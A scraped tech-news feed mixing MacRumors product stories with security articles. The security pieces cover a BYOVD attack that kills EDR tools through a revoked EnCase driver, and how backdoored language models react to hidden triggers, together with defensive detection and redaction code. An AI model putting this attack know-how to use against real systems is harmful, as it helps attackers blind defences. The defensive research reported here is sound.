Tech
Tech Articles from a wide variety of topics and categories
Omdia reports that global tablet shipments reached 162 million units in 2025, a 9.8% year-over-year increase. The research firm said the strongest momentum occurred during the holiday quarter, when shipments reached 44 million units, also up 9.8% compared to the same quarter a year earlier. Omdia described the annual total as the highest shipment volume since the demand surge of 2020, with part of the 2025 increase attributed to buyers anticipating memory supply constraints.
Apple was a key contributor to the market's late-year growth. Omdia says that Apple shipped 19.6 million iPads in the fourth quarter of 2025, representing a 16.5% year-over-year increase. The firm said this performance was driven by strong demand for the 11th-generation iPad and the M5 iPad Pro.
The fourth-quarter results increased Apple's market share to 44.9%. This placed Apple well ahead of other tablet vendors during the holiday quarter, with Samsung at 14.7%, Lenovo at 8.8%, Huawei at 6.9%, and Xiaomi at 6.4%. Other manufacturers collectively accounted for the remaining 18.3% of shipments.
The report also highlighted changes in how tablets are expected to be positioned in the coming years, including greater emphasis on ecosystem integration and artificial intelligence features.
Regional performance varied across the year. Omdia said Central and Eastern Europe recorded the fastest growth in 2025, followed by Asia Pacific. All regions experienced double-digit growth except North America, where vendor and retail discounting helped offset an otherwise declining trend during the holiday season.
Tag: Omdia
This article, "iPad Demand Surges as Apple Strengthens Grip on Tablet Market" first appeared on MacRumors.com
For those who have yet to watch the video, iFixit opens up the AirTag 2 and reveals what is new inside, including a redesigned speaker that is up to 50% louder than the one in the previous AirTag, according to Apple. The teardown also provides a look at the AirTag 2's second-generation Ultra Wideband chip and more.
The overall design of the AirTag 2 is similar to the original version of the item tracking accessory.
While a previous teardown showed that it is more difficult to remove the speaker in the AirTag 2, compared to the one in the original AirTag, iFixit was still able to disable the speaker's audible chime with the use of a soldering gun.
For those who are not familiar, the AirTag is a small accessory that you can attach to your backpack, keys, or other items. Then, you can track the location of those items in the Find My app on the iPhone, iPad, Mac, Apple Watch, and iCloud.com.
Apple released the new AirTag last month. In addition to the louder speaker, Precision Finding works up to 50% farther away from an item compared to the previous-generation model, and the overall Bluetooth tracking range is also improved.
Related Reading: AirTag 2 Hands-On: What's New and Should You Upgrade?
Related Roundup: AirTag
Tags: iFixit, Teardown
This article, "iFixit Shares AirTag 2 Teardown, Here's What's New" first appeared on MacRumors.com
It was initially reported that iPhone 18 Pro models would have fully under-screen Face ID, with only a front camera visible in the top-left corner of the screen. However, the latest rumors indicate that the devices will have only partially under-screen Face ID, which will result in a narrower Dynamic Island area.
Below, we have recapped 12 features rumored for the iPhone 18 Pro models, as of February 2026:
The same overall design is expected, with 6.3-inch and 6.9-inch display sizes, and a "plateau" housing three rear cameras
More power-efficient LTPO+ displays
A narrower Dynamic Island, resulting from Face ID being partially under the screen
Variable aperture for at least one rear camera
A20 Pro chip manufactured with TSMC's 2nm process and new packaging technology
A simplified Camera Control button with no swipe gestures
Design changes to the rear Ceramic Shield for MagSafe charging, potentially including a more frosted glass appearance
Apple-designed C1X or C2 modem for 5G/LTE cellular connectivity
Apple-designed N1 chip or newer for Wi-Fi 7, Bluetooth 6, and Thread
Web browsing via satellite
New color options under consideration: burgundy, brown, or purple
iPhone 18 Pro Max may be slightly thicker than the iPhone 17 Pro Max, perhaps to accommodate a larger battery
Bookmark our iPhone 18 roundup to stay on top of future rumors.
Related Roundup: iPhone 18
Related Forum: iPhone
This article, "What to Expect From the iPhone 18 Pro After the Latest Rumor Reversal" first appeared on MacRumors.com
Note: MacRumors is an affiliate partner with Woot. When you click a link and make a purchase, we may receive a small payment, which helps us keep the site running.
You can get the Solo Loop for just $14.99 ($34 off) and the Braided Solo Loop for $29.99 ($69 off). All bands in this sale are in brand new condition and come with a one-year Apple limited warranty.
Up to 70% off: Apple Watch Bands at Woot
Woot has reorganized the sale for 2026, with shoppers choosing their size before color this time around. Woot has size 1-12 of the Solo Loop and Braided Solo Loop available, but color and style availability varies within each size category.
Shoppers should note that this sale is focused on colors of the Braided Solo Loop and Solo Loop that Apple has stopped selling, and it doesn't include any of the new band colors. That being said, all of the bands in this sale are in new condition.
The entire sale is focused on Solo Loop and Braided Solo Loop Apple Watch bands, so you'll need to know the size that works best for you before you buy. Apple has a measurement tool on its website that you can use to determine your exact size.
If you're on the hunt for more discounts, be sure to visit our Apple Deals roundup where we recap the best Apple-related bargains of the past week.
Related Roundup: Apple Deals
This article, "Woot's Apple Watch Band Sale Has Solo/Braided Loops at Massive Discounts" first appeared on MacRumors.com
CNET this week published the results of a large-scale battery-life comparison based on testing conducted throughout 2025 across 35 smartphones sold in the United States. According to the report, Apple and OnePlus ranked as the two brands with the strongest battery performance overall, based on averaged results from multiple battery benchmarks.
The top-performing individual device in the testing was Apple's iPhone 17 Pro Max, which finished first overall despite not having the largest battery capacity among the tested phones. It has a battery capacity of 5,088 mAh, and its extended battery life is largely attributed to silicon efficiency and software optimization.
The iPhone 17 tied for second place alongside the OnePlus 15. The iPhone 17 achieved this ranking despite having the smallest battery capacity among the top-performing phones. The Poco F7 Ultra placed third, while the iPhone 17 Pro placed fourth in the overall rankings.
CNET's methodology included standardized tests using two benchmarks designed to minimize real-world variability. The first involved streaming video over Wi-Fi at full brightness for three hours, while the second was a 45-minute endurance test that included gaming, video streaming, social media scrolling, and a video call. Results from both tests were averaged to determine final rankings.
The iPhone 17 Pro Max again ranked first in the endurance benchmark, followed by the iPhone 17, iPhone 17 Pro, and iPhone 16e. The publication noted that Google's Pixel 10 and Pixel 10 Pro Fold also performed well in this specific test, along with Motorola's Razr.
The experiment also compared battery life across smartphone brands by averaging results from companies for which at least three models were tested. Apple and OnePlus ranked first and second respectively in overall brand battery performance. Motorola and Samsung followed in third and fourth place, while Google ranked fifth.
Related Roundups: iPhone 16e, iPhone 17, iPhone 17 Pro
Tags: Battery Life, CNET
Buyer's Guide: iPhone 16e (Caution), iPhone 17 (Neutral), iPhone 17 Pro (Neutral)
Related Forum: iPhone
This article, "iPhone 17 Pro Max vs. Android Battery Life: New Test Reveals Winner" first appeared on MacRumors.com
According to a new supply chain report from The Elec, Apple is evaluating transparent polyimide film as a protective layer that would sit on top of the ultra-thin glass used in the foldable display. The report says the company is currently testing two options for this outer film: polyethylene terephthalate (PET) and clear polyimide (CPI).
Most of today's foldable displays use ultra-thin glass to improve clarity and rigidity, but the glass still requires a flexible polymer film on top to prevent scratches and damage. This is the layer that users actually touch, making it a key factor in overall durability and feel.
Samsung currently uses PET film as the protective layer on top of the ultra-thin glass in its Galaxy Z Fold and Galaxy Z Flip devices. The Elec says Apple's evaluation of CPI is rooted in a wish to differentiate its approach. CPI is more expensive than PET, but has better surface hardness and scratch resistance.
Kolon Industry has apparently emerged as a potential supplier of the material. The company previously built a mass production line for CPI film after anticipating strong demand from upcoming foldable devices. China-based Lens Technology is expected to supply the ultra-thin glass for the foldable iPhone and will handle bonding the final protective film to the glass.
The final decision on the protective film is expected to be made soon as Apple continues testing remaining components of the first foldable iPhone. Other rumors suggest that the device will feature a 7.8-inch crease-free inner display, a 5.5-inch cover display, Touch ID, two rear cameras, the A20 chip, and the "C2" modem. It is expected to launch alongside the iPhone 18 Pro and iPhone 18 Pro Max later this year.
Tags: Foldable iPhone, The Elec
This article, "Apple Hoping to Outdo Rivals With Tougher Display for Foldable iPhone" first appeared on MacRumors.com
According to a Huntress report, the activity was observed during a customer investigation in early 2026 and involved the use of an old EnCase forensic driver (by Guidance Software) as part of the Bring Your Own Vulnerable Driver (BYOVD) technique to terminate Endpoint Detection and Response (EDR) processes from kernel mode.
The intrusion began with compromised SonicWall SSL VPN credentials, after which the attacker conducted internal reconnaissance and deployed a custom “EDR killer” binary.
“The attack was disrupted before ransomware deployment, but the case highlights a growing trend: threat actors weaponizing signed, legitimate drivers to blind endpoint security,” Huntress researchers said in a blog post. “The EnCase driver’s certificate expired in 2010 and was subsequently revoked, yet Windows still loads it, a gap in Driver Signature Enforcement that attackers continue to exploit.”
Microsoft did not immediately respond to CSO’s request for comments.
The BYOVD abuse
According to the researchers, the attack used a well-known technique: loading a legitimately signed driver that runs with kernel privileges. This gave the attackers direct, high-privilege access to the kernel, effectively allowing them to terminate almost any process they want, including security tooling.
Windows' Driver Signature Enforcement, the policy requiring all kernel-mode drivers to be digitally signed by a trusted Certificate Authority (CA), doesn't check certificate revocation lists at kernel load time. The researchers described this as legacy behavior that remains exploitable because of a backward-compatibility exception, introduced years ago, for drivers signed with certificates issued before July 29, 2015 that chain to a supported cross-signed CA.
The EnCase driver carries a countersignature timestamp from a VeriSign service, which the signature check still honors. "When code is signed with a timestamp, Windows validates the signature against the time the signature was created, not the current date," the researchers noted. "Because the driver was timestamped while the certificate was still valid (before January 31, 2010), the signature remains valid indefinitely, even though the certificate has since expired."
Once in the kernel, the driver exposes an IOCTL interface that lets the malware terminate arbitrary processes with full system privileges. Among the functionality exposed are process termination commands that bypass user-mode safeguards for Protected Process Light (PPL) processes, the defenses EDR systems depend on to avoid tampering.
The kill list excluded Huntress
The EDR killer binary observed by Huntress bundles a 64-bit Windows executable with a custom-encoded kernel driver payload, which it decodes to OemHwUpd.sys and installs as a kernel-mode service. Because Windows still honors the driver's cryptographic signature, the attackers were able to load it.
Once the vulnerable driver was in place, the EDR killer worked from an internal list of 59 well-known security tool processes, hashing their names and continuously checking for their presence on the system. "The kill loop runs continuously with a 1-second sleep interval, ensuring any security process that restarts is immediately terminated again," the researchers said.
Incidentally, Huntress said it wasn't on the kill list. "While the EDR killer targets nearly every major EDR and AV vendor on the market, the Huntress agent was not among the 59 processes targeted for termination," it added. Once the driver was written to disk, the binary established persistence by registering it as a Windows kernel service.
Huntress recommended enabling Microsoft’s Vulnerable Driver Blocklist on all supported Windows systems to prevent known abused drivers from loading. The researchers also advised enforcing strong access controls on remote access services, including MFA for VPNs such as SonicWall, and closely monitoring for suspicious driver installation activity. Where possible, organizations are also encouraged to enable virtualization-based security features like Hypervisor-protected Code Integrity (HVCI) to further restrict kernel-mode abuse.
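The monitoring Huntress recommends can be expressed as a small detection over driver-load telemetry. The following is an added example written for this page, not Huntress's or Microsoft's tooling: it parses constructed records shaped like Sysmon Event ID 6 (DriverLoad) message bodies and flags a load when its SHA256 appears on a local blocklist, when the signer is on a watchlist of signers whose old drivers are known to be abused, when a signed driver's signature status is anything other than valid, or when the driver is loaded from outside the normal drivers directory. The blocklist hashes, the watchlist entry (taken from the case above) and both records are placeholders, not real indicators.

```python
"""Flag suspicious kernel-driver loads from Sysmon Event ID 6 (DriverLoad) records.

Added illustration; not Huntress's or Microsoft's tooling. The log records, the
blocklist hashes and the signer watchlist are constructed placeholders, not real IOCs.
"""
from dataclasses import dataclass, field

# Hypothetical local blocklist keyed by lowercase SHA256. In production, derive it from
# Microsoft's vulnerable driver blocklist (shipped as a WDAC policy) or a threat-intel feed.
BLOCKLISTED_HASH = "a" * 64
BENIGN_HASH = "b" * 64
BLOCKLISTED_SHA256 = {BLOCKLISTED_HASH}

# Signers whose old drivers have been abused in BYOVD attacks. The entry comes from
# the Huntress case described above; treat the list as an assumption to be maintained.
WATCHED_SIGNERS = {"guidance software"}

# Where legitimately installed kernel drivers normally live.
EXPECTED_DRIVER_DIRS = ("c:\\windows\\system32\\drivers\\",)


@dataclass
class DriverLoad:
    image: str
    sha256: str
    signed: bool
    signer: str
    status: str
    findings: list = field(default_factory=list)


def parse_sysmon6(record: str) -> DriverLoad:
    """Parse the 'Key: Value' lines of a Sysmon Event ID 6 message body."""
    fields = {}
    for line in record.strip().splitlines():
        key, _, value = line.partition(":")
        fields[key.strip()] = value.strip()
    hashes = dict(h.split("=", 1) for h in fields.get("Hashes", "").split(",") if "=" in h)
    return DriverLoad(
        image=fields.get("ImageLoaded", ""),
        sha256=hashes.get("SHA256", "").lower(),
        signed=fields.get("Signed", "false").lower() == "true",
        signer=fields.get("Signature", ""),
        status=fields.get("SignatureStatus", ""),
    )


def assess(load: DriverLoad) -> DriverLoad:
    """Attach findings. A signature that still verifies is not a clean bill of health:
    kernel-mode signing policy does not consult revocation lists, so the hash and signer
    checks matter more than SignatureStatus on its own."""
    if load.sha256 in BLOCKLISTED_SHA256:
        load.findings.append("hash on vulnerable-driver blocklist")
    if load.signer.lower() in WATCHED_SIGNERS:
        load.findings.append(f"signer '{load.signer}' associated with BYOVD abuse")
    if load.signed and load.status.lower() != "valid":
        load.findings.append(f"signed but signature status is '{load.status}'")
    if not load.image.lower().startswith(EXPECTED_DRIVER_DIRS):
        load.findings.append("driver loaded from an unexpected directory")
    return load


def scan(records) -> list:
    """Parse and assess every record, returning the annotated DriverLoad objects."""
    return [assess(parse_sysmon6(r)) for r in records]


# Constructed records in the shape of Sysmon Event ID 6 message bodies.
SAMPLE_RECORDS = [
    rf"""
    ImageLoaded: C:\Windows\System32\drivers\tcpip.sys
    Hashes: SHA256={BENIGN_HASH}
    Signed: true
    Signature: Microsoft Windows
    SignatureStatus: Valid
    """,
    rf"""
    ImageLoaded: C:\ProgramData\OemHwUpd.sys
    Hashes: SHA256={BLOCKLISTED_HASH}
    Signed: true
    Signature: Guidance Software
    SignatureStatus: Valid
    """,
]

if __name__ == "__main__":
    for result in scan(SAMPLE_RECORDS):
        verdict = "SUSPICIOUS" if result.findings else "ok"
        print(f"{verdict:10} {result.image}  {'; '.join(result.findings)}")
```

The second record deliberately reports a valid signature, which is the point of the Huntress case: a revoked or expired certificate does not make the load fail, so the detection cannot lean on signature status and needs the hash and signer checks. Pair this with a rule on System Event ID 7045 for newly installed kernel-mode services to catch the persistence step as well.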
Akira is one of the most dangerous ransomware groups and is known for numerous attacks on German companies. Now it has apparently hit the Bremen-based steel trader Buhlmann. In a darknet post, the hacker group claims to have stolen sensitive information from the Buhlmann Group.
The attackers are threatening to publish 55 gigabytes of data. The Buhlmann Group has not yet commented officially. A spokeswoman confirmed to the regional magazine buten un binnen that a US subsidiary was affected by a cyberattack. The affected IT system, however, is used only in the USA.
German site not affected
"There was no access to the IT systems and data of other group companies, in particular those in Germany and the EU, and such access is not possible," the company spokeswoman said. Therefore, no data outside the US site is at risk.
By its own account, the Buhlmann Group employs around 2,000 people in 23 countries. The company generated annual revenue of 428 million euros in 2024.
Further reading:
Akira attacks bakery chain Schäfer
Akira attacks Ideal Versicherung
As enterprises deploy AI across customer support, software development, legal analysis and internal operations, a new data exposure surface has quietly emerged. It does not sit in databases, file systems or network links. It lives inside AI inference traffic, an area that falls outside most traditional security models and visibility frameworks, as InfoWorld explains in its analysis of why AI is all about inference now.
This shift has happened quickly. In many organizations, AI systems have moved from pilot projects to core infrastructure in less than two years. Yet security architectures have not evolved at the same pace. The result is a widening gap between where sensitive data actually flows and where security teams are looking.
This gap is rapidly becoming one of the most overlooked security risks in modern enterprise environments.
AI prompts are high-value targets
AI prompts are often dismissed as transient inputs: temporary strings of text that exist only for the duration of a request. In reality, they frequently contain some of the most sensitive data an organization possesses:
- Proprietary source code and internal tooling
- Confidential documents and legal contracts
- Customer PII and financial records
- Strategic workflows and decision logic
Recent industry analysis shows that enterprises are increasingly feeding sensitive proprietary data into generative AI systems to improve relevance and accuracy, particularly as organizations work to unlock internal data layers for AI-driven applications. InfoWorld has documented this trend in its discussion of getting the enterprise data layer unstuck for AI.
From a business perspective, this makes sense. AI systems perform best when they are grounded in real organizational knowledge. From a security perspective, however, it represents a fundamental change in how sensitive data is handled. Information that was once confined to controlled repositories is now being copied, transformed and transmitted as part of inference requests.
Unlike traditional data flows, prompts are rarely classified, sanitized or monitored. They pass through application layers, middleware, logging systems, observability pipelines and third-party services with minimal scrutiny. In many cases, they are treated as operational exhaust rather than as high-value data.
This creates a dangerous mismatch: some of the most sensitive data in the organization is flowing through one of the least protected pipelines.
Why existing controls fall short
Traditional security architectures were not designed for AI workloads, and the limitations become clear at the inference layer.
Encryption protects data only until it is decrypted for processing. At that point, prompts may be exposed to application memory, runtime environments, debugging tools, observability platforms and administrative access. While transport encryption remains essential, it does little to reduce exposure once data reaches the systems that actually perform inference.
Data loss prevention tools also struggle in this context. Legacy DLP solutions were built around structured data, well-defined patterns and predictable storage locations. AI prompts are dynamic, unstructured and context dependent. As a result, DLP tools often lack the semantic understanding needed to determine whether a prompt contains sensitive material or whether its use is appropriate. These limitations are well documented in discussions around why legacy DLP approaches fall short in modern data security environments.
Logging and observability introduce another layer of risk. To troubleshoot AI systems, teams often log prompts, responses and intermediate states. These logs are then shipped to centralized platforms, retained for long periods and accessed by broad groups of engineers. What begins as a debugging convenience can quickly become a repository of sensitive data stored far outside its original security perimeter.
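One practical mitigation for the logging problem just described is to treat the logging hook itself as the control point: redact the prompt before it is shipped anywhere, and keep only a keyed fingerprint for correlation. The block below is an added example for this page, not code from the article or from any product it mentions. Its detectors are deliberately narrow (e-mail addresses, card numbers that pass a Luhn check, and three assumed API-key shapes); the sample prompt and the fingerprint key are constructed, and a real deployment would layer organization-specific classifiers on top.

```python
"""Redact sensitive material from AI prompts at the logging boundary.

Added example, not from the original article. Detectors are intentionally narrow;
the sample prompt and FINGERPRINT_KEY are constructed placeholders.
"""
import hashlib
import hmac
import re

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
# 13 to 19 digits, optionally separated by spaces or dashes; confirmed with Luhn below
CARD_RE = re.compile(r"\b\d(?:[ -]?\d){12,18}\b")
# Assumed key shapes: AWS access key ID, GitHub classic PAT, generic "sk-" style secret
SECRET_RE = re.compile(r"\b(?:AKIA[0-9A-Z]{16}|ghp_[A-Za-z0-9]{36}|sk-[A-Za-z0-9]{20,})\b")

# Assumption: in production this key comes from a secrets store, never from source.
# A keyed hash stops anyone with log access from confirming a guessed prompt offline.
FINGERPRINT_KEY = b"replace-me-with-a-managed-secret"


def luhn_ok(digits: str) -> bool:
    """Luhn checksum, used so order numbers and other digit runs are not redacted."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def redact_prompt(prompt: str) -> tuple:
    """Return (redacted_text, counts_by_kind). Secrets are handled first so their
    digits can never be mistaken for part of a card number."""
    counts = {"secret": 0, "email": 0, "card": 0}

    def replacer(kind, validate=None):
        def _sub(match):
            if validate is not None and not validate(match.group()):
                return match.group()
            counts[kind] += 1
            return f"[REDACTED_{kind.upper()}]"
        return _sub

    text = SECRET_RE.sub(replacer("secret"), prompt)
    text = EMAIL_RE.sub(replacer("email"), text)
    text = CARD_RE.sub(replacer("card", lambda s: luhn_ok(re.sub(r"\D", "", s))), text)
    return text, counts


def log_record(prompt: str, user: str) -> dict:
    """What an inference-logging hook should emit: redacted text, per-kind counts and a
    keyed fingerprint, so incidents can be correlated without keeping the raw prompt."""
    redacted, counts = redact_prompt(prompt)
    fingerprint = hmac.new(FINGERPRINT_KEY, prompt.encode("utf-8"), hashlib.sha256).hexdigest()[:16]
    return {"user": user, "prompt": redacted, "redactions": counts, "fingerprint": fingerprint}


# Constructed prompt of the kind a support-automation app might send to a model.
SAMPLE_PROMPT = (
    "Summarize this ticket from alice@example.com: card 4111 1111 1111 1111 was declined "
    "on order 1234 5678 9012 3456. Use key AKIAIOSFODNN7EXAMPLE to pull the account."
)

if __name__ == "__main__":
    print(log_record(SAMPLE_PROMPT, user="svc-support-bot"))
```

Two design choices matter here. The Luhn check is what keeps the card detector from eating the order number on the same line, which is exactly the semantic judgement the article says pattern-only DLP lacks; and the fingerprint is an HMAC rather than a plain hash, because a plain hash of a short prompt can be reversed by guessing once the log is exposed.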
In many environments, trust effectively stops at the API gateway. Beyond that boundary, AI inference traffic is implicitly trusted, even though it frequently crosses internal and external trust zones. This implicit trust model may have worked for traditional application architectures, but it is poorly suited to AI systems that blur the line between user input, internal data and external services.
Internal risk is the bigger threat
While external attackers remain a concern, internal exposure is often the more likely and less visible risk.
Over-permissioned service accounts, misconfigured logging pipelines, compromised credentials or legitimate insider access can all result in silent prompt leakage. Unlike traditional breaches, these exposures do not require exploitation of vulnerabilities. They occur as a byproduct of normal operations in complex environments.
AI systems exacerbate this risk because of their scale and frequency of use. A single application may generate thousands or millions of inference requests per day, each potentially containing sensitive data. Within that volume, misuse or accidental exposure can easily blend into normal traffic patterns.
Research into insider risk consistently shows that accidental exposure is far more common than malicious breach, particularly in cloud environments where ownership and responsibility are distributed across teams. AI systems add yet another layer of complexity, making it harder to answer basic questions about who can access inference data, where it is stored and how long it is retained.
Because AI usage is frequent and expected, abnormal access patterns may not trigger alarms. This makes AI inference an ideal low-noise channel for data exposure, one that does not resemble traditional indicators of compromise and is therefore difficult to detect with existing tools.
The quantum time bomb
Beyond immediate exposure, there is a longer term risk that security leaders can no longer afford to treat as theoretical: cryptographic durability.
AI prompts and responses often contain data that must remain confidential for many years: source code that underpins competitive advantage, customer records subject to regulatory protection, proprietary processes and strategic decisions. Yet much of today's AI inference traffic is protected using cryptographic methods designed primarily for short-term transport security, not long-term confidentiality.
This distinction matters. A sufficiently large quantum computer would break the public-key algorithms (RSA and elliptic-curve Diffie-Hellman) that protect the key exchange for data in transit; symmetric encryption is far less affected, but a recorded TLS session whose key exchange is broken later gives up its contents. While large-scale, fault-tolerant quantum computers are not yet available, the associated risk is already present. Adversaries can capture encrypted data today and decrypt it later, once those cryptographic assumptions fail.
Security agencies and standards bodies have explicitly warned about these “harvest now, decrypt later” threats. The National Institute of Standards and Technology has highlighted the need to assess which data assets require long-term protection in its post-quantum cryptography guidance.
AI significantly expands the volume of data that may fall into this category. Inference traffic often includes rich contextual information that would be highly valuable if decrypted in the future. Unlike traditional records, this data is frequently generated at scale and retained in logs, analytics systems or backups without clear lifecycle controls.
For regulated industries with long data-retention requirements such as finance, healthcare and critical infrastructure, this creates a silent exposure window that extends far beyond current compliance cycles. Organizations may be meeting today's regulatory requirements while unintentionally accumulating long-term cryptographic risk.
AI has unintentionally expanded not just the amount of sensitive data in motion, but the amount of data that must remain secure well into a post-quantum future, often without organizations realizing it.
The bottom line for security leaders
This gap exists not because teams are careless, but because AI inference does not fit cleanly into existing security models. It crosses trust boundaries that were never designed with AI in mind and introduces data flows that traditional controls were never built to govern.
As AI becomes embedded in core enterprise workflows, the security implications of inference traffic can no longer be treated as an edge case. They represent a fundamental shift in how sensitive data is created, processed and exposed.
This is not a call for a specific solution, but a problem the industry can no longer afford to ignore.
This article is published as part of the Foundry Expert Contributor Network.
In a blog post, Microsoft said its research focused on identifying hidden triggers and malicious behaviors embedded during the training or fine-tuning of language models, which can remain dormant until activated by specific inputs.
Such backdoors can allow attackers to alter model behavior in subtle ways that enable data exposure or allow malicious activity to slip past traditional security controls unnoticed.
As enterprises increasingly rely on third-party and open-source models for applications ranging from customer support to security operations, the integrity of those models is under scrutiny.
“Unlike traditional software, where scanners look for coding mistakes or known vulnerabilities, AI risks can include hidden behavior planted inside a model,” said Sunil Varkey, a cybersecurity analyst. “A model may work normally but respond in harmful ways when it sees a secret trigger.”
That risk is more concerning because LLMs can be deployed without deep inspection, leaving security teams with limited visibility into their training or vulnerabilities.
Signatures that suggest backdoors
Microsoft’s researchers identified three observable indicators, or “signatures,” that suggest the presence of backdoors in language models.
One of the strongest indicators is a shift in how a model pays attention to a prompt when a hidden trigger is present. In backdoored models, trigger tokens tend to dominate the model’s attention, effectively overriding the rest of the input.
“We find that trigger tokens tend to ‘hijack’ the attention of backdoored models, creating a distinctive double triangle pattern,” Microsoft said.
The researchers also found that backdoored models may leak information about how they were poisoned. In some cases, specific prompts caused models to regurgitate fragments of the very training data used to insert the backdoor, including parts of the trigger itself.
Another key finding is that language model backdoors behave differently from traditional software backdoors. Rather than responding only to an exact trigger string, many backdoored models react to partial or approximate versions of the trigger.
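The first of the three signatures, attention concentrating on the trigger tokens, can be turned into a simple score. The block below is an added illustration for this page and is not Microsoft's scanner: it takes a self-attention map (rows are query positions, columns are key positions, each row sums to one and is causal), computes how much attention each token receives from the positions that can see it, and flags a token whose share dwarfs the runner-up. The two maps are constructed for a five-token prompt; in practice they come from a forward pass with attention outputs enabled, averaged over heads and layers, and the threshold is an assumption to be calibrated on a known-clean model.

```python
"""Score whether one token hijacks a self-attention map.

Added illustration of the 'attention hijack' signature described above; not
Microsoft's scanner. Both attention maps are constructed for a five-token prompt.
"""


def attention_received(attn):
    """For each key position j, the mean attention it receives from the query positions
    that can see it (i >= j). Plain column means would penalise later tokens in a
    causal model, since earlier rows cannot attend to them at all."""
    n = len(attn)
    return [sum(attn[i][j] for i in range(j, n)) / (n - j) for j in range(n)]


def hijack_score(attn, skip_first=True):
    """Return (most-attended position, ratio of its share to the runner-up).
    Position 0 is skipped by default: many models park surplus attention on the first
    token (an 'attention sink'), which would otherwise look like a trigger."""
    received = attention_received(attn)
    candidates = list(range(1 if skip_first else 0, len(received)))
    ranked = sorted(candidates, key=lambda j: received[j], reverse=True)
    top, runner_up = received[ranked[0]], received[ranked[1]]
    return ranked[0], top / max(runner_up, 1e-9)


def flag_trigger(attn, threshold=2.0):
    """Position of a suspected trigger token, or None. The threshold is an assumption;
    calibrate it against attention maps from a known-clean model of the same family."""
    position, ratio = hijack_score(attn)
    return position if ratio >= threshold else None


# Constructed: each query spreads attention evenly over the tokens it can see.
CLEAN_ATTN = [
    [1.0, 0.0, 0.0, 0.0, 0.0],
    [0.5, 0.5, 0.0, 0.0, 0.0],
    [1 / 3, 1 / 3, 1 / 3, 0.0, 0.0],
    [0.25, 0.25, 0.25, 0.25, 0.0],
    [0.2, 0.2, 0.2, 0.2, 0.2],
]

# Constructed: token 2 plays the trigger; every later query pours attention onto it.
HIJACKED_ATTN = [
    [1.0, 0.0, 0.0, 0.0, 0.0],
    [0.5, 0.5, 0.0, 0.0, 0.0],
    [0.05, 0.05, 0.9, 0.0, 0.0],
    [0.03, 0.03, 0.91, 0.03, 0.0],
    [0.02, 0.02, 0.92, 0.02, 0.02],
]

if __name__ == "__main__":
    for name, attn in (("clean", CLEAN_ATTN), ("hijacked", HIJACKED_ATTN)):
        print(name, hijack_score(attn), flag_trigger(attn))
```

To probe the third signature, the tolerance for partial triggers, run the same score on prompts that contain only a substring of a suspected trigger and watch whether the concentration persists; a real scanner also has to cope with multi-token triggers, where the mass is spread across adjacent positions rather than a single column.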
Effectiveness of the scanner
Microsoft said the scanner does not require retraining models or prior knowledge of backdoor behavior and operates using forward passes only, avoiding gradient calculations or backpropagation to keep computing costs low.
The company also said it works with most causal, GPT-style language models and can be used across a wide range of deployments.
Analysts say that while the approach improves visibility into language model poisoning, it is an incremental advance rather than a breakthrough, noting that several leading EDR platforms already claim the ability to detect backdoors in open-weight LLMs.
The bigger question is how long such detection advantages will last.
“While this new scanner will help counter real-world attacker techniques currently, adversaries will adapt quickly to outflank this scanner,” said Keith Prabhu, founder and CEO of Confidis. “We are seeing a repeat of the ‘virus’ wars, where hackers kept evolving viruses to evade detection by using innovative techniques like polymorphic viruses.”
That said, the scanner is essential for companies that download open-source models to use or customize in their own systems, according to Varkey.
“For them, AI models become part of the supply chain, just like software libraries,” Varkey said. “The scanner is not a complete solution, but it is an important new layer of protection as AI adoption grows.”
Part of the challenge is that most boards don’t have cybersecurity practitioners and expertise, making it challenging to understand the linkage between technical risks and business impact. It’s the responsibility of the CISO to translate technical cybersecurity outcomes into business terms that enable board members to make well-informed decisions on future investments and financial protection for the business. Additionally, senior leadership teams need to be prepared to discuss concepts like risk appetite and potential degrees of business interruption. That’s because no amount of cybersecurity investment can guarantee zero disruptions; a certain amount of risk must be accepted.
Unfortunately, this unintentional communication gap comes with the nature of cyber threats. The board wants to know how well-positioned the company is to avoid costly business interruptions, regulatory penalties or class action lawsuits from cyber incidents. It's tempting to rely on internal audits and regulatory compliance (such as SOC 2 attestations), but these don't provide a robust answer on cyber resilience: many companies have failed to stop cyberattacks despite extensive investments in cybersecurity tools and compliance. (In fact, Gartner predicts worldwide end-user spending on information security will reach $240 billion in 2026.)
Cybersecurity leaders desperately need to prove the performance of cybersecurity investments and demonstrate confidently and with evidence that safeguards are working as intended all the time. There’s an obvious opportunity to change the conversation with boards and senior leadership teams.
Why trust fails: The limits of compliance and communication
Cybersecurity frameworks like the NIST CSF, and compliance with them, are key. However, while they were designed to standardize and validate an acceptable level of controls, they don't guarantee positive cybersecurity outcomes. Passing an audit once a year doesn't mean your controls work every day. For instance, a misconfigured control can create direct breach exposure. A backup gap might break your recovery time objective (RTO) promise. A missing insurance requirement at the time of an attack could void coverage.
It’s tempting for CISOs to present heatmaps and dashboards that are too technical for board members. When executives ask why something is red, the conversation may wander into what seems to the board like subjectivity. The Securities and Exchange Commission (SEC) cybersecurity disclosure requirements have forced boards to engage. New rules have increased visibility and consequences for both boards and CISOs without necessarily improving fluency. CISOs are accountable but still lack the means to prove the outcome of their team’s work. Bridging the language gap between cybersecurity leaders and business requires translation, but it’s also an opportunity to redefine the role of cybersecurity and focus on the desired outcome sought after by business leaders: cyber resilience.
Building a common language to get to “Here’s the proof of cyber resilience”
CISOs can reframe the discussion using data and evidence. Modern cybersecurity tools produce a large volume of data and information on how they operate at any point in time, the status of controls deployed, the validation of configuration and more. There’s an opportunity to collect such data, sanitize it and derive continuous insights that validate, at any point in time, not just compliance with cybersecurity regulations but also overall cybersecurity posture. Because these insights are proof of actual state, the CISO can illuminate gaps in protection on an ongoing basis and either address these gaps or help the business determine mitigation priorities. And in some cases, a perfectly appropriate business decision is to accept a risk. It’s important to capture that acceptance formally, document why it was accepted and ensure that the acceptance is reviewed on an appropriate cadence so the level of risk over time doesn’t outpace a company’s appetite.
This removes much of the subjectivity and confusion from board reports. CISOs can show proof of readiness and effectiveness, and boards can interpret results in familiar business terms.
Practical steps for CISOs to prove resilience
Cybersecurity deployment is critical, but insufficient. Every day, even organizations with robust cybersecurity investments fall victim to cyber attacks. Board and business leaders put the burden on cybersecurity leaders, but actually demand more: they want cyber resilience.
